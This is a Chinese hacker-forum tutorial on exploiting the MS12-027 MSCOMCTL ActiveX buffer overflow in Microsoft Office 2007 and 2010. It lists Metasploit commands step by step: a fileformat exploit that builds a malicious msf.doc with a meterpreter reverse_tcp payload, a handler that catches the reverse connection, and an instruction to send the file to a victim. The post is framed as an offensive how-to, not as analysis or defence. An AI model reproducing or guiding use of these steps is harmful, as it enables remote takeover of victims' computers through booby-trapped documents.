远程Windows PC用Microsoft Office MS12-027 MSCOMCTL ActiveX缓冲区溢出

小皮
3020小皮首席执行运营官
技术交流 2019-08-21 17:48:16
3020 技术交流 2019-08-21 17:48:16
此模块利用MSCOMCTL.OCX中的堆栈缓冲区溢出。它使用恶意RTF嵌入2012年4月在野外开发的特制MSComctlLib.ListViewCtrl.2控件。该模块以Office 2007和Office 2010目标为目标。Office 2010上的DEP / ASLR旁路是由Abysssec提出的Ikazuchi ROP链完成的。这个链使用“msgr3en.dll”,它将在办公室加载后加载,因此恶意文件必须通过“文件/打开”加载才能实现利用。


利用目标
Windows XP SP 2,3上的MS Office 2007


Windows 7 / SP1上的MS Office 2010


需求
攻击者:Backtrack 5


受害者PC:Windows XP


打开回溯终端类型  msfconsole






现在输入  use exploit / windows / fileformat / ms12_027_mscomctl_bof


msf exploit(ms12_027_mscomctl_bof)> set payload windows / meterpreter / reverse_tcp


msf exploit(ms12_027_mscomctl_bof)> set lhost 192.168.1.3(本地主机的IP)


msf exploit(ms12_027_mscomctl_bof)> exploit






在我们成功生成恶意doc文件后,它将存储在您的本地计算机上


/root/.msf4/local/msf.doc






现在我们需要设置一个监听器来处理攻击成功执行时受害者发送的反向连接。


使用exploit / multi / handler


设置有效负载windows / meterpreter / reverse_tcp


设置lhost 192.168.1.3


利用现在,只要下载并打开它们,就会将msf.doc文件发送给受害者。现在您可以访问受害计算机上的meterpreter shell。
本文标题:远程Windows PC用Microsoft Office MS12-027 MSCOMCTL ActiveX缓冲区溢出
本文作者:小皮
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t3108.html
游客
登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
weixin
蚁安黑客

找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

微信号:baiyiwangan